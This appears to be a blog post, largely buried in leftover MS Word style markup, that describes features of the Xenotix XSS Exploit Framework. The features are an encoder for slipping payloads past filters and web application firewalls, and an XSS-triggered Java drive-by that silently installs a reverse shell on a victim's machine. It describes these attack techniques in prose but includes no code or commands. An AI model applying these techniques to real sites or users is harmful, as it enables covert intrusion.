UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles></xml><![endif]--><!--[if gte mso 10]><style> /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin-top:0in; mso-para-margin-right:0in; mso-para-margin-bottom:8.0pt; mso-para-margin-left:0in; line-height:107%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi;} </style><![endif]--> </div><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">[VIDEO] <a href="https://www.youtube.com/watch?v=i8c3kf4t6A8">https://www.youtube.com/watch?v=i8c3kf4t6A8</a>[/VIDEO]</span></b></div><br /><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"></span></b></div><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"> </span></b></div><h4 class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">XSS Payload Encoder</span></b></b></h4><b style="mso-bidi-font-weight: normal;"> </b><br /><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><br /></b></div><b style="mso-bidi-font-weight: normal;"></b><span style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"></span></span><br /><div class="MsoNormal"><span style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">The inbuilt Encoder will allow encoding into different forms to bypass various filters and Web Application Firewalls. The encoder supports Base64 Encoding, URL Encoding, HEX Encoding, HTML Characters Conversion, Character Code Conversion and IP to Dword, Hex and Octal conversions.</span></span></span></div><span style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"></span></span><div class="MsoNormal"><span style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"><br /></span></span></div><span style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"></span></span><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"><div class="MsoNormal"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"></span></div></span></b><br /><div class="MsoNormal"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"> </span></div><h4 class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">XSS Reverse Shell</span></b></h4><div class="MsoNormal"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">A XSS Reverse Shell can be implemented with Xenotix XSS Exploit Framework. This is made possible with the help of Java Drive-By. The XSS vulnerable web application exploited with the injectable scripts generated by XSS Reverse Shell when presented to a victim will initiate the drive by download of a Reverse TCP connecting shell. After the drive-by download, the reverse shell is executed by the same method used in Java Drive-by. </span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://i49.tinypic.com/11147li.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="http://i49.tinypic.com/11147li.png" width="400" /></a></div><div class="MsoNormal"><br /></div>  <br /><div class="MsoNormal"></div><div class="MsoNormal"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">The advantage of this method is that the reverse shell is downloaded and executed in the victim’s system without his knowledge. But for the execution of reverse shell, it will pop up a UAC dialog requesting for the permission to run the executable. The tool is having an inbuilt Listener that listens to the reverse shell. It is designed in a user friendly manner. All you have to do is to specify the reverse connection IP and port.<span style="mso-spacerun: yes;">  </span></span></div><div class="MsoNormal"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"><span style="mso-spacerun: yes;"></span></span></div><div class="MsoNormal"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"><span style="mso-spacerun: yes;"> </span></span></div><div class="MsoNormal"><br /></div><div class="MsoNormal"><span style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">  </span></span><!--[if gte mso 9]><xml> <o:OfficeDocumentSettings> <o:RelyOnVML/> <o:AllowPNG/> </o:OfficeDocumentSettings></xml><![endif]--></div><div class="MsoNormal"><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true" DefSemiHidden="true" DefQFormat="false" DefPriority="99" LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false" UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" 